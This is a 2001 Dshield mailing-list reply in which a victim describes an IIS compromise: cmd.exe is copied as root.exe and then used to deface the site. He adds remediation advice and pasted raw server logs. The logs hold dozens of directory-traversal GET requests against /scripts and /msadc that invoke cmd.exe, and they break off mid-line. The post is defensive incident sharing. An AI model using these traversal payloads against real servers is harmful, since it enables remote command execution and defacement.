[Dshield] RE: Check this out

shilor shilor at optonline.net
Tue Aug 21 17:29:03 GMT 2001


A few months ago somebody compromised my computer using exactly the same
program (before RC time).
1. The program tries to find a vulnerable IIS folder, usually
inetpub/wwwroot/scripts or ////msadc.
2. If found, it copies or renames cmd.exe to this folder with the name
root.exe (or using cmd.exe to add root.exe, I am not sure).
3. Later, the attacker uses root.exe to act on your computer. In my case
he installed anti American HTML pages on my IIS virtual directories with
the names: index.htm, default.htm, etc...
4. Since my default page was default.htm, this anti American page
appeared on my site (instead of my resume). Root.exe is very powerful
and can also delete files.

You should scan your computer for root.exe files. If found, correct your
internet access privileges setup and than just delete these programs.
The offender will probably continue attacking your machine for some
time, as it happened to me.

Regards,
Zeev Shilor, SPM

--------------------------------------------------------------------
2001-07-24 20:16:42 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 70 - 2001-07-24
20:16:42 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 - 2001-07-24
20:16:43 61.151.255.114 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-07-24
20:16:43 61.151.255.114 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-07-24
20:16:44 61.151.255.114 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-07-24
20:16:44 61.151.255.114 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-07-24
20:16:45 61.151.255.114 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-07-24
20:16:45 61.151.255.114 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 0 - 2001-07-24
20:16:46 61.151.255.114 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 - 2001-07-24
20:16:46 61.151.255.114 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 - 2001-07-24
20:16:48 61.151.255.114 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-07-24 20:16:48 61.151.255.114 - GET 
/scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 10 -
2001-07-24 20:16:49 61.151.255.114 - GET 
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 20 -
2001-08-10 12:13:40 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 90 - 2001-08-10
12:13:41 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 - 2001-08-10
12:13:43 61.182.207.228 - GET 
/scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-08-10
12:13:54 61.182.207.228 - GET 
/scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-08-10
12:13:56 61.182.207.228 - GET 
/scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 10 - 2001-08-10
12:14:00 61.182.207.228 - GET 
/scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-08-10
12:14:02 61.182.207.228 - GET 
/scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 - 2001-08-10
12:14:04 61.182.207.228 - GET 
/scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 - 2001-08-10
12:14:06 61.182.207.228 - GET 
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 - 2001-08-10
12:14:11 61.182.207.228 - GET 
/scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 - 2001-08-10
12:14:16 61.182.207.228 - GET 
/scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-08-10 12:14:24 61.182.207.228 - GET 




More information about the list mailing list